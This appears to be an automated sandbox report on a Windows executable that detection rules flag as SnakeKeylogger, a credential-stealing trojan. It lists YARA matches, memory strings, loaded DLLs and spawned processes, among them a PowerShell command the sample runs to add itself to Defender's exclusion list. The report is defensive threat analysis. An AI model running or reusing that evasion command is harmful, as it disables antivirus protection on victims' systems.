Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9EAF8	5_2_06C9EAF8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9E249	5_2_06C9E249
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9E258	5_2_06C9E258
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C98B90	5_2_06C98B90
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9F3A8	5_2_06C9F3A8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C98BA0	5_2_06C98BA0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9F3B8	5_2_06C9F3B8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9EB08	5_2_06C9EB08
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C90B20	5_2_06C90B20
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9D0F8	5_2_06C9D0F8
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C90040	5_2_06C90040
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9F801	5_2_06C9F801
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C90006	5_2_06C90006
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C95018	5_2_06C95018
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9F810	5_2_06C9F810
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9D999	5_2_06C9D999
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C9D9A8	5_2_06C9D9A8

Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004399000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJmdv.exe. vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1193223203.0000000003476000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000000.1136291884.0000000000F42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJmdv.exe. vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1196550082.00000000059C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1192272100.00000000030D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.00000000043D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000000.00000002.1191269934.000000000163E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000005.00000002.3609453878.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000005.00000002.3609203581.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe, 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 3GrfjMY0pG.exe
Source: 3GrfjMY0pG.exe	Binary or memory string: OriginalFilenameJmdv.exe. vs 3GrfjMY0pG.exe

Source: 3GrfjMY0pG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 3GrfjMY0pG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/11@3/4

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3GrfjMY0pG.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak33eccm.hcs.ps1

Jump to behavior

Source: 3GrfjMY0pG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3GrfjMY0pG.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003328000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003337000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.000000000336B000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003377000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 3GrfjMY0pG.exe	Virustotal: Detection: 75%
Source: 3GrfjMY0pG.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

File read: C:\Users\user\Desktop\3GrfjMY0pG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Process created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
